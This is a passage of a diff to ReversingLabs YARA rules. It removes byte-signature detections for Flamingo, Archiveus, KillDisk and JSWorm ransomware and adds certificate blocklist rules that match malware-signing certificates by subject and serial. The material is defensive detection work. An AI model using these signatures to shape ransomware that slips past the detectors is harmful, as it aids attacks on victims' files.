01 CA 8B 4C 24 ?? BD ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? - 48 8B 84 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 31 C0 48 81 - C4 ?? ?? ?? ?? 5B 5D 5F 5E 41 5C 41 5D 41 5E 41 5F C3 - } - condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($generate_key) and ($drop_ransom_note) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Funcall" and pe.signatures[i].serial=="19:9a:94:76:fe:ca:3c:00:4f:f8:89:d3:45:45:de:07" and 1138060800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Flamingo : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_1Efe65 : INFO FILE { meta: - description = "Yara rule that detects Flamingo ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "333ef1f9-ac54-5a3d-9b2b-50483eeb93e1" - date = "2021-04-14" - modified = "2021-04-14" + id = "e402e3b4-a598-504d-85b8-8c1994cb51fc" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Flamingo.yara#L1-L54" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "446c0d332af01c0fceb0356d5ab273eb55764869cc8343468b75625e5d4d1036" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14458-L14474" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f849b6899b6766807cfddf99ecb809fe923f35f04de09b62235da352ce6e6e24" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Flamingo" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? - 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? - ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 - ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08 - C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ?? - 80 F9 ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 - 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 - C0 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F - 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 - } - $encrypt_files = { - 68 ?? ?? ?? ?? 83 EC ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B CC C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? C6 85 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? - ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? C6 00 ?? 8D 85 - ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 68 ?? ?? - ?? ?? 51 6A ?? 83 EC ?? C6 45 ?? ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? - C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? - C6 00 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? - ?? 8B BD ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 68 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 8D 47 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 83 EC ?? 8B CC C7 41 ?? ?? ?? ?? - ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? - 8B 01 EB ?? 8B C1 6A ?? C6 00 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 - } - condition: - uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Software Plugin Ltd." and pe.signatures[i].serial=="1e:fe:65" and 1063224491<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Win32_Ransomware_Archiveus : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Cert_Blocklist_0Af7E2B6A3Deb99291Dcaf66 : INFO FILE { meta: - description = "Yara rule that detects Archiveus ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "89e5af93-1153-5367-a539-6af77c99c214" - date = "2020-07-15" - modified = "2020-07-15" + id = "f9c18796-995e-58f8-8406-9adcad143ae7" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Archiveus.yara#L3-L50" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2b8a42b98ab3e8b97d2e226e979f342a6a72f21d8f068f59c21ad95764077f8a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14476-L14492" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "270b5655a0f54abceb520eaca714ed4f6d4de720883e2759acd5bb2f027dfd2b" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Archiveus" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $entry_point = { - 68 ?? ?? 40 00 E8 ?? ?? ?? FF - } - $dump_instruction = { - 8B 3D ?? ?? ?? ?? 6A ?? FF D7 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 - 74 ?? 8B 46 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 8D 4D ?? FF 15 ?? ?? ?? ?? - 50 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A - ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF D7 FF 15 ?? ?? ?? ?? E9 ?? ?? - ?? ?? 8D 4D ?? 51 FF 15 ?? ?? ?? ?? 8D 55 ?? 6A ?? 52 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? - ?? ?? 6A ?? 6A ?? 6A ?? 8D 45 ?? 68 ?? ?? ?? ?? 8D 4D ?? 50 51 FF D3 50 8D 55 ?? 8D - 45 ?? 52 50 FF D3 50 FF 15 - } - $extension_rule = { - 8B 13 6A ?? 68 ?? ?? ?? ?? 52 50 FF 15 ?? ?? ?? ?? D9 85 ?? ?? ?? ?? DB 85 ?? ?? ?? - ?? DD 9D ?? ?? ?? ?? DC 8D ?? ?? ?? ?? DF E0 A8 ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? - ?? DC 05 ?? ?? ?? ?? DF E0 A8 ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 4D ?? 89 45 - ?? FF 15 ?? ?? ?? ?? 8B 46 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 8D 4D ?? FF - 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 8D 4D ?? FF 15 ?? ?? ?? ?? - 50 6A ?? 6A ?? 6A ?? FF 15 - } - $instruction_string = "INSTRUCTIONS HOW TO GET YOUR FILES BACK.txt" wide - condition: - uint16(0)==0x5A4D and ($entry_point at pe.entry_point) and $dump_instruction and $extension_rule and $instruction_string + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="0a:f7:e2:b6:a3:de:b9:92:91:dc:af:66" and 1474523112<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Killdisk : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_45E27C4Dfa5E6175566A13B1B6Ddf3F5 : INFO FILE { meta: - description = "Yara rule that detects KillDisk ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "bd04ac88-987a-58f0-8f0a-508662b3c930" - date = "2020-07-15" - modified = "2020-07-15" + id = "b4ab6397-5e15-5eb3-9f5d-658c5e3a7e3d" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.KillDisk.yara#L1-L80" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6148e6fc1363ff8995a9100e07139bfa658c72892db4d30a973bad0f2b3e6c3f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14494-L14510" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "9bcbb84207984b259463482f094bf0f3815f0d74317b6b864dab44769ff5e7e8" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "KillDisk" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files = { - 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 8B AC 24 ?? ?? ?? - ?? 56 57 33 FF 8B F1 3B F7 89 7D ?? 89 7D ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 56 - FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 95 C0 84 C0 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 56 8D - 4C 24 ?? 89 7C 24 ?? 89 7C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ?? B8 ?? ?? ?? ?? - E9 ?? ?? ?? ?? 8B 5C 24 ?? 3B DF 8B 44 24 ?? 89 45 ?? 89 5D ?? 77 ?? 83 F8 ?? 0F 82 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 56 FF 15 - ?? ?? ?? ?? 8B E8 3B EF 0F 84 ?? ?? ?? ?? 83 FD ?? 0F 84 ?? ?? ?? ?? 8B 0D ?? ?? ?? - ?? 33 C0 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 - 44 24 ?? 89 44 24 ?? 8D 44 24 ?? 50 6A ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 54 - 24 ?? 57 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 85 C0 0F - 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D - 4C 24 ?? 51 8D 54 24 ?? 89 7C 24 ?? 52 8D BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? - 85 C0 0F 84 ?? ?? ?? ?? 8B 74 24 ?? 6A ?? 8B C6 05 ?? ?? ?? ?? 50 8B CB 83 D1 ?? 51 - 6A ?? 6A ?? 55 FF 15 ?? ?? ?? ?? 85 C0 89 44 24 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 - ?? ?? ?? ?? 8D 4C 24 ?? 51 53 56 8B F8 E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 0F 84 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 8D 54 24 ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? ?? ?? ?? 8D B4 - 24 ?? ?? ?? ?? 8D 7C 24 ?? 8D 44 24 ?? F3 A5 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8B 08 89 8C 24 ?? ?? ?? ?? 8B 50 ?? 89 94 24 ?? ?? ?? ?? 8B 48 ?? 89 8C 24 - ?? ?? ?? ?? 8B 50 ?? 89 94 24 ?? ?? ?? ?? 8B 48 ?? 89 8C 24 ?? ?? ?? ?? 8B 50 ?? 8D - 74 24 ?? 89 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 6A ?? 6A ?? 53 50 55 FF 15 - ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ?? 8D 54 24 ?? 52 55 C7 44 24 ?? ?? ?? - ?? ?? FF 15 ?? ?? ?? ?? 8B F0 8B 44 24 ?? F7 DE 1B F6 83 E6 ?? 50 83 C6 ?? FF 15 ?? - ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8B C6 EB ?? 8B 44 24 ?? 50 BE ?? ?? ?? ?? FF 15 ?? ?? - ?? ?? 55 FF 15 ?? ?? ?? ?? 8B C6 EB ?? 55 BE ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C6 EB - ?? 55 BE ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C6 EB ?? 55 BE ?? ?? ?? ?? FF 15 ?? ?? ?? - ?? 8B C6 EB ?? BE ?? ?? ?? ?? 8B C6 EB ?? B8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E - 5D 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 - } - $app_whitelisting_1 = { - 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 56 57 32 DB FF 15 - ?? ?? ?? ?? 6A ?? 6A ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 8B E8 85 ED 89 6C 24 ?? 0F 84 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? - 51 55 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 64 24 ?? - 8B 54 24 ?? 3B 54 24 ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? 33 FF E8 ?? ?? ?? ?? 85 C0 - 0F 86 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B C1 - 2B C3 C1 F8 ?? 3B C7 0F 86 ?? ?? ?? ?? 3B D9 8B F3 76 ?? E8 ?? ?? ?? ?? 8B 1D ?? ?? - ?? ?? 8B 0D ?? ?? ?? ?? 89 74 24 ?? 8D 34 BE 3B F1 B8 ?? ?? ?? ?? 8B E8 77 ?? 3B F3 - 73 ?? E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 3B 75 ?? 72 ?? E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? - ?? 8B 44 24 ?? 39 06 74 ?? B8 ?? ?? ?? ?? 83 C7 ?? E8 ?? ?? ?? ?? 3B F8 72 ?? 8B 6C - 24 ?? 8B 74 24 ?? FF 15 ?? ?? ?? ?? 3B F0 74 ?? 85 F6 74 ?? 56 6A ?? 6A ?? FF 15 ?? - ?? ?? ?? 8B F0 85 F6 74 ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? EB ?? 8B - 6C 24 ?? 8D 4C 24 ?? 51 55 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? B3 ?? 55 FF 15 - ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5D 8A C3 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? - ?? ?? C3 - } - $app_whitelisting_2 = { - 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 56 A1 ?? ?? ?? ?? 33 C4 50 8D 44 - 24 ?? 64 A3 ?? ?? ?? ?? 8D 44 24 ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 70 ?? C7 44 - 24 ?? ?? ?? ?? ?? 56 C7 06 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ?? 8B 36 EB - ?? 33 F6 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 - ?? 8B 44 24 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7C 24 ?? ?? 72 ?? 8B 4C 24 - ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 64 89 0D - ?? ?? ?? ?? 59 5E 83 C4 ?? C3 - } - condition: - uint16(0)==0x5A4D and $encrypt_files and $app_whitelisting_1 and $app_whitelisting_2 + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Selig Michael Irfan" and pe.signatures[i].serial=="45:e2:7c:4d:fa:5e:61:75:56:6a:13:b1:b6:dd:f3:f5" and 1465474542<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Jsworm : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_37D36A4E61C0Ac68Ceb8Bfcef2Dbf283 : INFO FILE { meta: - description = "Yara rule that detects JSWorm ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a4702cc3-1e08-5631-b832-5d28cb92a819" - date = "2020-07-15" - modified = "2020-07-15" + id = "8fc73b48-6797-558a-8265-9aca396e899f" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.JSWorm.yara#L1-L93" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8ba5e2f29f5f06e6e6714bbba1129862da8c3a83bf7f296818eddee2593cae38" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14512-L14528" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "41e126600aae5646b808ed0a4294faa9a63e47842e9cde4fee9e5e65919af7ee" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "JSWorm" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 - FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? A8 ?? - 0F 85 ?? ?? ?? ?? A8 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 8D - 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 C6 45 ?? ?? 8B 4E ?? 8B 56 ?? 3B CA 73 - ?? 8D 41 ?? 89 46 ?? 8B C6 83 FA ?? 72 ?? 8B 06 C7 04 48 ?? ?? ?? ?? EB ?? 6A ?? C6 - 85 ?? ?? ?? ?? ?? 8B CE FF B5 ?? ?? ?? ?? 6A ?? E8 - } - $find_drives = { - 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? BE ?? ?? ?? ?? 0F 84 ?? - ?? ?? ?? 8B CE C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 51 ?? 8A 01 - 41 84 C0 75 ?? 2B CA 51 56 8D 4D ?? E8 ?? ?? ?? ?? 83 EC ?? C7 45 ?? ?? ?? ?? ?? 8B - CC 89 65 ?? 33 C0 6A ?? 68 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 66 - 89 01 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 55 ?? 8B CC E8 ?? ?? ?? ?? C6 45 ?? ?? - E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B - C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 - ?? ?? ?? ?? 83 C4 ?? 8B C6 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 46 03 F0 38 0E 0F 85 - ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 - 5D C3 E8 ?? ?? ?? ?? E8 - } - $encrypt_files_p1 = { - 8B 00 50 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B F0 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? - 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? - ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? C7 85 - ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 83 FA ?? - 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? - 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B - CB C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 E6 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 66 89 - 85 ?? ?? ?? ?? 8D 51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51 53 8D 8D ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 78 ?? ?? 72 ?? 8B 00 56 50 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 FA - ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 - 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? - ?? 8B 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 - 85 ?? ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA - ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 - E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF - 15 ?? ?? ?? ?? 8B D8 8D 45 ?? 50 53 89 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 7D ?? ?? - 0F 8C ?? ?? ?? ?? 7F ?? 81 7D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 53 - FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? - ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 C4 ?? 8B F8 89 BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? - B9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? F3 A5 8D 8D ?? - ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 - } - $encrypt_files_p2 = { - 8B 86 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 86 ?? ?? ?? ?? 89 85 ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 - 86 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 86 ?? ?? ?? ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 7C ?? - 6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 53 - FF 15 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 8B F4 8B CA 33 C0 - C7 46 ?? ?? ?? ?? ?? 8D 79 ?? C7 46 ?? ?? ?? ?? ?? 66 89 06 66 8B 01 83 C1 ?? 66 85 - C0 75 ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 53 8B 1D ?? ?? ?? ?? FF D3 6A ?? 8D 45 ?? - 50 FF 75 ?? 68 ?? 